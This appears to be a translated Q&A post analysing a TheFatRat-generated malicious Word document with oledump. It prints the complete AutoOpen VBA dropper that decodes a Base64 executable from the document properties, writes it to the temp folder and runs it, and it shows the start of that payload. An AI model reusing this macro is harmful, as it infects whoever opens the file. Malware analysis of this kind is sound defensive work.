[英]Where is Base64 code in TheFatRat Microsoft reverse shell document?
我用TheFatRat創建了一個反向 shell Microsoft Word 文檔,它主要創建反向外殼!
現在,我想對其進行逆向工程,所以我提出了REMNUX (帶有一些逆向工程工具的 Ubuntu)。
我使用了 oledump.py 和 output 是:
remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
A3 部分有這些宏:
remnux@remnux:~$ oledump.py kjbk.docm -v(解壓) -s A3
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
它顯然解碼了一些 Base64 代碼並運行它,問題是,我在任何 A1...A6 部分的這個文件上找不到任何 Base64(反向 shell 代碼)。 那么反向 shell 代碼在哪里?
我已經將文件上傳到這些位置,密碼是 123,它會創建反向 shell 到本地網絡(192.168....),所以它是無害的。
讓我們在我忘記之前回答一下,我敢打賭 TheFatRat 開發人員對此分析並不滿意,但我發現了反向 shell 代碼。
與 Emotet 惡意軟件不同,Base64 代碼不能被 oledump 之類的工具檢測到(它只查看受感染文檔的 word 目錄),它不會隱藏在主文檔 XML 文件中,我確實使用 Z3D945423F8E9496C024C 和 65B424C 打開了 Microsoft Word 文件瞧:
可執行文件隱藏在 docProps 目錄中。 它是 Base64,它包含反向 shell 代碼! 這將復制到 Windows 臨時文件夾。
它的第一行:
<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.